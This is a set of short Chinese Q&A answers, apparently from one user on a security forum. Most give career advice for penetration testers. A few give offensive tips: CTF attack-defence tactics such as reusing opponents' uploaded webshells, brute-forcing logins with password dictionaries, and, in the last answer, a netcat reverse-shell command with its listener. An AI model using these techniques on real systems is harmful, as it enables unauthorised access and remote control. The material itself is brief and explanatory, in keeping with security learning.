当渗透测试的技能和知识达到一定水平后,如果感觉没有新的学习空间或者提升机会,可能需要考虑转岗或转行。如果你对目前的工作不再满意,或者希望寻求更高层次的职业发展,这时可以考虑转岗。
回答于 2024-08-01 13:46
可以在渗透这方面多去实践,多去实战去挖掘漏洞,当你这方面可以到一定程度后,就可以继续提升代码能力了,补足短板
回答于 2024-08-01 13:44
如果你对网络安全领域充满热情,并且目前的工作能够让你不断学习和成长,那么可以选择继续工作。工作经验对于网络安全行业来说非常重要,实际操作经验可以帮助你更好地理解理论知识,并且在职业发展上积累优势。如果你觉得目前的学历限制了你的职业发展,可以考虑考研。考研有助于你在网络安全领域内获得更高层次的职位。无...
回答于 2024-08-01 13:41
首先自己写或者找些有用的脚本,比如流量监控、批量提交flag。 至于waf的话,有可能不能上,就不用找了,第一种方式就是你审计自己的源码,查看是否存在潜藏的漏洞, 第二种就是,监控流量,查看人家上线后,传上来的马,进行进一步的利用
回答于 2022-03-06 12:58
查看是否是cms搭建的或者是使用了框架,然后对测试用户名是否可以找到已创建的用户名,如果找到了真实的用户名,那么可以寻找密码字典进行爆破
回答于 2021-12-02 22:23
最简单的一种就是,一端监听,一端发起,从而建立数据通信,nc.exe -e cmd ip 端口 。 nc -lvvp 端口
回答于 2021-12-02 17:27